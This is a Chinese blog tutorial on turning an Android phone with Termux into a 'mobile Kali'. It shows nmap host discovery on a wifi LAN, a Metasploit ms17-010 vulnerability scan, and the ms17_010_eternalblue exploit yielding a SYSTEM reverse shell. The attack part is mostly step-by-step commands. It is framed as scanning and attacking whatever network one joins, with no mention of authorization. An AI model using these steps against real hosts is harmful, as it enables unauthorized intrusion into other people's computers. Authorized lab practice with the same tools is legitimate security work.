admin管理员组

文章数量:1559755

至少我们曾经在一起过。

来自:一言

介绍

Termux是一个Android下一个高级的终端模拟器,开源且不需要root,支持apt管理软件包,十分方便安装软件包,完美支持Python,PHP,Ruby,Go,Nodejs,MySQL等。随着智能设备的普及和性能的不断提升,如今的手机、平板等的硬件标准已达到了初级桌面计算机的硬件标准,用心去打造完全可以把手机变成一个强大的工具.

前言

Termux终端安装在安卓手机上,就相当于是一个便携式服务器,可以下载Metasploit,Nmap,Sqlmap,hydra等渗透测试工具,可以走到哪儿扫到哪儿,舒服就完事了[aru_23],等于一个移动kali。

环境模拟

当你拿着手机连上一个wifi,通过扫描发现局域网内存在一台在线的电脑,并且存在漏洞,所以需要进行一些简单的扫描渗透测试,所以就要利用到Termux来实现,拿到目标权限。[aru_32]

安卓手机ip:192.168.2.100

目标主机ip:未知

测试开始

1.先使用nmap扫描局域网内存活的主机。

nmap -sP 192.168.2.0/24

温馨提示

通过扫描可以知道,IP:192.168.2.1 是路由器地址,IP:192.168.2.100 是我们手机地址,IP:192.168.2.106 是目标地址

2.探测目标主机详细信息,可以用-A

nmap -A 192.168.2.106

温馨提示

通过nmap扫描可以知道目标主机是win2008系统(ps:没有win7的镜像~就用这个演示一下[aru_15]),并且开启了smb服务,所以我们可以试试扫描目标主机是否存在ms17-010漏洞

3.利用Metasploit扫描目标是否存在漏洞

msfconsole #进入Metasploit

search ms17-010 #搜索漏洞

use auxiliary/scanner/smb/smb_ms17-010 #使用ms17-010扫描服务

set rhost 192.168.2.106 #设置目标地址

run #执行

经过扫描,目标存在ms17-010漏洞,接下来就可以直接利用漏洞反弹shell了

4.反弹shell

use exploit/windows/smb/ms17_010_eternalblue #使用该漏洞

set rhost 192.168.2.106 #设置目标

run #执行

温馨提示

这里就攻击成功,直接反弹shell了,并且权限为system权限。[aru_15]

总结

又水了一篇文章~这个教程就是简单的演示一下如何用手机使用Metasploit等工具进行渗透测试,并且还可以使用sqlmap,走到哪儿注入到哪儿[aru_17]

本文标签: 手机终端初体验测试教程